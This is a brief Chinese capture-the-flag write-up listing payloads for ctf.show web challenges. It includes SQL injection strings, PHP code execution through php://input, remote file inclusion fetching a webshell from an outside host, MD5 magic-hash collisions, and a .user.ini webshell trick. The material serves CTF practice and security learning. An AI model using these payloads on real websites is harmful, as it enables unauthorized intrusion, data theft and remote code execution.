ctf.show web

仅payload或简单思路,持续更新

web2
admin' or 1=1#
admin' or 1=1 union select 1,group_concat(flag),3 from web2.flag#

web3
http://bd154800-80c7-4e24-9175-4eb98b4d3584.chall.ctf.show/?url=php://input
POST: <?php system("ls");?>
POST: <?php system("cat ctf_go_go_go");?>

web4
远程文件包含:486f9d64-fe46-4c00-8da3-8a31d154530b.chall.ctf.show/?url=http://hausahan.cn/temp.txt
#temp.txt内容:
<?php
$myfile=fopen('temp.php','w');
$txt = 'mumaneirong';
fwrite($myfile,$txt);
fclose($myfile)
?>

486f9d64-fe46-4c00-8da3-8a31d154530b.chall.ctf.show/temp.php?hausa=cat ./../flag.txt

web5
md5碰撞
62499f30-4ef5-4609-80f0-0e8211a8a225.chall.ctf.show/?v1=QNKCDZO&v2=240610708

web6
admin'/**/union/**/select/**/1,concat(flag),3/**/from/**/flag#

web7
0fcebb43-b8f7-44cb-a460-95f836ed7773.chall.ctf.show/index.php?id=1'/**/union/**/select/**/1,concat(flag),3/**/from/**/flag#

web8
过滤了单引号和逗号
解题脚本:https://github.com/hausa-han/CTFscripts/blob/main/ctfshow-web8.py

web9
POST:password=ffifdyop

web10
username:admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#

web11
删除cookie后空密码登录

web12
禁用了system();
?cmd=print_r(glob("*"));
?cmd=highlight_file("xxxx.php");

web13
传txt马,后传.user.ini,并指定auto_prepend_file为自己的马

web14
/here_1s_your_f1ag.php?query=-1//union//select/**/load_file('/var/www/html/secret.php')
?query=-1//union//select/**/load_file('/real_flag_is_here')

CTFshow web1
www.zip
user_main.php中提供不同的排序显示方法,可逐步猜出flag,可有以下脚本:
https://github.com/hausa-han/CTFscripts/blob/main/CTFshow_web1.py

红包题第二弹
/?cmd=?>/???/?p /???????? p.ppp;?>
/p.ppp